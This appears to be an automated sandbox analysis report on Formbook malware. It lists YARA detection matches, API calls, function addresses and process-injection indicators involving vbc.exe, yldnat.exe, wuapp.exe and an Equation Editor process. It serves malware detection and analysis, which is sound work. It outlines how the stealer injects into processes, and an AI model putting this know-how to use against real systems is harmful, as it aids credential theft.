Source: 00000006.00000000.982109510.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000000.982109510.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000000.1012975505.000000000B8A4000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000000.1012975505.000000000B8A4000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.1032166526.0000000000240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.1032166526.0000000000240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.1032215807.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.1032215807.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.1175360038.0000000000110000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.1175360038.0000000000110000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000000.1024425011.000000000B8A4000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000000.1024425011.000000000B8A4000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.1032081329.00000000000C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.1032081329.00000000000C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000000.981158681.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000000.981158681.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Contains functionality to shutdown / reboot the system

Source: C:\Users\Public\vbc.exe

Code function: 4_2_00403646 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

4_2_00403646

Detected potential crypto function

Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 5_2_013B1890	5_2_013B1890
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 5_2_013BC3BD	5_2_013BC3BD
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 5_2_013BA184	5_2_013BA184
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 5_2_013BB3F1	5_2_013BB3F1
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 5_2_013B9C12	5_2_013B9C12
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 5_2_013B96A0	5_2_013B96A0
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 5_2_013B7E88	5_2_013B7E88
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 5_2_00110A41	5_2_00110A41
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_00401030	6_2_00401030
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_0041E1F5	6_2_0041E1F5
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_0041E9FF	6_2_0041E9FF
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_00409220	6_2_00409220
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_0040DBC0	6_2_0040DBC0
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_0041DBBD	6_2_0041DBBD
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_00402D89	6_2_00402D89
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_00402D90	6_2_00402D90
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_0041EF50	6_2_0041EF50
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_0041DF0D	6_2_0041DF0D
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_0041E79A	6_2_0041E79A
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_00402FB0	6_2_00402FB0
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_013BA184	6_2_013BA184
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_013B1890	6_2_013B1890
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_013BC3BD	6_2_013BC3BD
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_013BB3F1	6_2_013BB3F1
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_013B9C12	6_2_013B9C12
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_013B96A0	6_2_013B96A0
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_013B7E88	6_2_013B7E88
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_0086E0C6	6_2_0086E0C6
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_0089D005	6_2_0089D005
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_00873040	6_2_00873040
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_0088905A	6_2_0088905A
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_0086E2E9	6_2_0086E2E9
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_00911238	6_2_00911238
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_009163BF	6_2_009163BF
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_0086F3CF	6_2_0086F3CF
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_008963DB	6_2_008963DB
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_00872305	6_2_00872305
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_00877353	6_2_00877353
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_008BA37B	6_2_008BA37B
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_00881489	6_2_00881489
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_008A5485	6_2_008A5485
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_008F443E	6_2_008F443E
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_008AD47D	6_2_008AD47D
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_0088C5F0	6_2_0088C5F0
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_0087351F	6_2_0087351F
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_008B6540	6_2_008B6540
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_00874680	6_2_00874680
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_0087E6C1	6_2_0087E6C1
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_00912622	6_2_00912622
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_008BA634	6_2_008BA634
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_008F579A	6_2_008F579A
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_0087C7BC	6_2_0087C7BC
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_008A57C3	6_2_008A57C3
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01EAE0C6	8_2_01EAE0C6
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01F2D06D	8_2_01F2D06D
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01EB3040	8_2_01EB3040
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01EC905A	8_2_01EC905A
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01EDD005	8_2_01EDD005
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01EAF3CF	8_2_01EAF3CF
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01ED63DB	8_2_01ED63DB
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01F563BF	8_2_01F563BF
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01EFA37B	8_2_01EFA37B
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01EB7353	8_2_01EB7353
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01EB2305	8_2_01EB2305
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01EAE2E9	8_2_01EAE2E9
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01F51238	8_2_01F51238
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01F305E3	8_2_01F305E3
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01ECC5F0	8_2_01ECC5F0
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01EF6540	8_2_01EF6540
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01EB351F	8_2_01EB351F
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01EC1489	8_2_01EC1489
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01EE5485	8_2_01EE5485
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01EED47D	8_2_01EED47D
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01F3443E	8_2_01F3443E
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01EE57C3	8_2_01EE57C3
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01EBC7BC	8_2_01EBC7BC
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01F3579A	8_2_01F3579A
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01EBE6C1	8_2_01EBE6C1
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01EB4680	8_2_01EB4680
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01F52622	8_2_01F52622
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01EFA634	8_2_01EFA634
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01EC69FE	8_2_01EC69FE
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01EB29B2	8_2_01EB29B2
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01F5098E	8_2_01F5098E
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01F35955	8_2_01F35955
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01F3394B	8_2_01F3394B
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01F4F8EE	8_2_01F4F8EE
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01F2F8C4	8_2_01F2F8C4
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01ED286D	8_2_01ED286D
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01EBC85C	8_2_01EBC85C
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01F3DBDA	8_2_01F3DBDA
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01F5CBA4	8_2_01F5CBA4
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01ED7B00	8_2_01ED7B00
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01F63A83	8_2_01F63A83
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01F4FDDD	8_2_01F4FDDD
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01EBCD5B	8_2_01EBCD5B
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01EE0D3B	8_2_01EE0D3B
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01F22FDC	8_2_01F22FDC
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01F4CFB1	8_2_01F4CFB1
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01EDDF7C	8_2_01EDDF7C
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01EC0F3F	8_2_01EC0F3F
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01ECEE4C	8_2_01ECEE4C
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01EE2E2F	8_2_01EE2E2F
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_0012E1BE	8_2_0012E1BE
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_0012E1EB	8_2_0012E1EB
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_00119220	8_2_00119220
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_0012E79A	8_2_0012E79A
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_0012E9FF	8_2_0012E9FF
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_0011DBC0	8_2_0011DBC0
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_00112D90	8_2_00112D90
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_00112D89	8_2_00112D89
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_0012DEF7	8_2_0012DEF7
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_00112FB0	8_2_00112FB0

Found potential string decryption / allocating functions

Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: String function: 008DF970 appears 41 times
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: String function: 008B373B appears 112 times
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: String function: 008B3F92 appears 59 times
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: String function: 013B4599 appears 38 times
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: String function: 0086DF5C appears 59 times
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: String function: 013B2400 appears 54 times
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: String function: 01EADF5C appears 121 times
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: String function: 01F1F970 appears 84 times
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: String function: 01EF373B appears 245 times
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: String function: 01EF3F92 appears 132 times
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: String function: 01EAE2A8 appears 38 times

Contains functionality to call native functions

Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_0041A2D0 NtCreateFile,	6_2_0041A2D0
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_0041A380 NtReadFile,	6_2_0041A380
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_0041A400 NtClose,	6_2_0041A400
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_0041A4B0 NtAllocateVirtualMemory,	6_2_0041A4B0
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_0041A2CA NtCreateFile,	6_2_0041A2CA
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_0041A28A NtCreateFile,	6_2_0041A28A
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_0041A4AA NtAllocateVirtualMemory,	6_2_0041A4AA
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_008600C4 NtCreateFile,LdrInitializeThunk,	6_2_008600C4
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_00860048 NtProtectVirtualMemory,LdrInitializeThunk,	6_2_00860048
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_00860078 NtResumeThread,LdrInitializeThunk,	6_2_00860078
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_008607AC NtCreateMutant,LdrInitializeThunk,	6_2_008607AC
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_0085F9F0 NtClose,LdrInitializeThunk,	6_2_0085F9F0
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_0085F900 NtReadFile,LdrInitializeThunk,	6_2_0085F900
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_0085FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,	6_2_0085FAD0
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_0085FAE8 NtQueryInformationProcess,LdrInitializeThunk,	6_2_0085FAE8
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_0085FBB8 NtQueryInformationToken,LdrInitializeThunk,	6_2_0085FBB8
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_0085FB68 NtFreeVirtualMemory,LdrInitializeThunk,	6_2_0085FB68
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_0085FC90 NtUnmapViewOfSection,LdrInitializeThunk,	6_2_0085FC90
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_0085FC60 NtMapViewOfSection,LdrInitializeThunk,	6_2_0085FC60
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_0085FD8C NtDelayExecution,LdrInitializeThunk,	6_2_0085FD8C
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_0085FDC0 NtQuerySystemInformation,LdrInitializeThunk,	6_2_0085FDC0
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_0085FEA0 NtReadVirtualMemory,LdrInitializeThunk,	6_2_0085FEA0
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_0085FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,	6_2_0085FED0
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_0085FFB4 NtCreateSection,LdrInitializeThunk,	6_2_0085FFB4
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_008610D0 NtOpenProcessToken,	6_2_008610D0
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_00860060 NtQuerySection,	6_2_00860060
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_008601D4 NtSetValueKey,	6_2_008601D4
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_0086010C NtOpenDirectoryObject,	6_2_0086010C
Source: C:\Users\user\AppData\Local\Temp\yldnat.exe	Code function: 6_2_00861148 NtOpenThread,	6_2_00861148
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01EA00C4 NtCreateFile,LdrInitializeThunk,	8_2_01EA00C4
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01EA07AC NtCreateMutant,LdrInitializeThunk,	8_2_01EA07AC
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01E9F9F0 NtClose,LdrInitializeThunk,	8_2_01E9F9F0
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01E9F900 NtReadFile,LdrInitializeThunk,	8_2_01E9F900
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01E9FBB8 NtQueryInformationToken,LdrInitializeThunk,	8_2_01E9FBB8
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01E9FB68 NtFreeVirtualMemory,LdrInitializeThunk,	8_2_01E9FB68
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01E9FB50 NtCreateKey,LdrInitializeThunk,	8_2_01E9FB50
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01E9FAE8 NtQueryInformationProcess,LdrInitializeThunk,	8_2_01E9FAE8
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01E9FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,	8_2_01E9FAD0
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01E9FAB8 NtQueryValueKey,LdrInitializeThunk,	8_2_01E9FAB8
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01E9FDC0 NtQuerySystemInformation,LdrInitializeThunk,	8_2_01E9FDC0
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01E9FD8C NtDelayExecution,LdrInitializeThunk,	8_2_01E9FD8C
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01E9FC60 NtMapViewOfSection,LdrInitializeThunk,	8_2_01E9FC60
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01E9FFB4 NtCreateSection,LdrInitializeThunk,	8_2_01E9FFB4
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01E9FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,	8_2_01E9FED0
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01EA01D4 NtSetValueKey,	8_2_01EA01D4
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01EA1148 NtOpenThread,	8_2_01EA1148
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01EA010C NtOpenDirectoryObject,	8_2_01EA010C
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01EA10D0 NtOpenProcessToken,	8_2_01EA10D0
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01EA0060 NtQuerySection,	8_2_01EA0060
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01EA0078 NtResumeThread,	8_2_01EA0078
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01EA0048 NtProtectVirtualMemory,	8_2_01EA0048
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01E9F938 NtWriteFile,	8_2_01E9F938
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01EA1930 NtSetContextThread,	8_2_01EA1930
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01E9F8CC NtWaitForSingleObject,	8_2_01E9F8CC
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01E9FBE8 NtQueryVirtualMemory,	8_2_01E9FBE8
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01E9FA50 NtEnumerateValueKey,	8_2_01E9FA50
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01E9FA20 NtQueryInformationFile,	8_2_01E9FA20
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01EA1D80 NtSuspendThread,	8_2_01EA1D80
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01E9FD5C NtEnumerateKey,	8_2_01E9FD5C
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01E9FC90 NtUnmapViewOfSection,	8_2_01E9FC90
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01E9FC48 NtSetInformationFile,	8_2_01E9FC48
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01EA0C40 NtGetContextThread,	8_2_01EA0C40
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01E9FC30 NtOpenProcess,	8_2_01E9FC30
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01E9FFFC NtCreateProcessEx,	8_2_01E9FFFC
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01E9FF34 NtQueueApcThread,	8_2_01E9FF34
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01E9FEA0 NtReadVirtualMemory,	8_2_01E9FEA0
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_01E9FE24 NtWriteVirtualMemory,	8_2_01E9FE24
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_0012A2D0 NtCreateFile,	8_2_0012A2D0
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_0012A380 NtReadFile,	8_2_0012A380
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_0012A400 NtClose,	8_2_0012A400
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_0012A4B0 NtAllocateVirtualMemory,	8_2_0012A4B0
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_0012A28A NtCreateFile,	8_2_0012A28A
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_0012A2CA NtCreateFile,	8_2_0012A2CA
Source: C:\Windows\SysWOW64\wuapp.exe	Code function: 8_2_0012A4AA NtAllocateVirtualMemory,	8_2_0012A4AA

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Memory allocated: 77620000 page execute and read and write	Jump to behavior
